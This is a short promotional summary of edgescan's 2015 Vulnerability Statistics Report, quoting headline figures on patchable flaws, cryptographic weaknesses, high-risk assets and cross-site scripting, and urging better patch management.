edgescan™ have released their 2015 Vulnerability Statistics Report. As the only EU based Vulnerability Management Company listed by Gartner in both the Magic Quadrant for Managed Security Services and the Gartner Application Security Hypercycle the report reveals the true state of cybersecurity.
This is based on vulnerability data gathered in 2015 via the SaaS, edgescan.com.
“63% of all vulnerabilities discovered could have been mitigated via patch, configuration and component management combined.”
We are still not maintaining our systems in a secure manner. This is not difficult to do but can be time-consuming. A major cause of this is awareness and a lack of adequate patch management process and policy.
“61.4% or 2 of every 3 servers had a cryptographic vulnerability”
This in effect may result in data privacy and eavesdropping attacks against users data.
This is a cause of concern as our economy relies heavily on privacy and protection of sensitive information for many reasons. Such weaknesses are regularly exploited by both cybercriminals and nation-state agents in order to get a competitive edge in business or aid in identity & financial theft.
“15.1% of Assets have high or critical risk vulnerabilities”
High or critical vulnerabilities are defined as:
- Easily exploitable
- Remotely exploitable
- In some cases, such issues can affect both application and network layers combined.
Remediation: Even though patch management is not as exciting as other aspects of security, it’s still a vital aspect of maintaining a secure and robust posture. Security patches are a result of security bugs being discovered in application, framework & operating systems provided by system vendors.
Client-Side Security is still a significant issue.
Weakness such as Cross-Site-Scripting (The ability for an attacker to inject code into a user’s browser and possibly steal user credentials or install malware) is common.
Averages of 4.78 vulnerabilities are being discovered per web application assessed.
Such weak protections also assist an attacker with Phishing attacks and malware distribution.